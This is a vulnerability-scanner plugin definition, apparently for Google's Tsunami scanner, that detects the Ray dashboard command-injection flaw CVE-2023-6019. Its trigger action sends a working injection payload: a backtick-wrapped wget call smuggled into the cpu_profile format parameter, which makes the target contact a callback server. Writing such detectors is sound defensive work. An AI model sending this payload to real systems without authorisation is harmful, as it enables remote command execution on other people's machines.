# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
  type: VULN_DETECTION
  name: "Ray_CVE_2023_6019"
  author: 
    "Robert Dick (robert@doyensec.com) for templated version, "
    "Viviana Sutedjo (vsutedjo@google.com) for original Java version"
  version: "2.0"
}

finding: {
  main_id: {
    publisher: "GOOGLE"
    value: "CVE_2023_6019"
  }
  severity: CRITICAL
  title: "CVE-2023-6019 Unauthenticated Command Injection in Ray"
  description: 
    "A command injection exists in Ray's cpu_profile URL parameter allowing"
    " attackers to execute os commands on the system running the ray"
    " dashboard remotely without authentication."
  recommendation:
    "Upgrade Ray to version 2.8.0. or later."
  related_id: {
    publisher: "CVE",
    value: "CVE-2023-6019"
  }
}

###########
# ACTIONS #
###########

actions: {
  name: "fingerprint_ray"
  http_request: {
    method: GET
    uri: "/"
    response: {
      http_status: 200
      expect_all: {
        conditions: [
          { body: {} contains: '<title>Ray Dashboard</title>' }
        ]
      }
    }
  }
}

actions: {
  name: "trigger_callback"
  http_request: {
    method: GET
    uri: "/worker/cpu_profile?pid=1&duration=5&native=0&format=`wget -qO- {{ T_CBS_URI }}`"
  }
}

actions: {
  name: "sleep"
  utility: { sleep: { duration_ms: 1000 } }
}

actions: {
  name: "check_callback_server_logs"
  callback_server: { action_type: CHECK }
}

#############
# WORKFLOWS #
#############

workflows: {
  condition: REQUIRES_CALLBACK_SERVER
  actions: [
    "fingerprint_ray",
    "trigger_callback",
    "sleep",
    "check_callback_server_logs"
  ]
}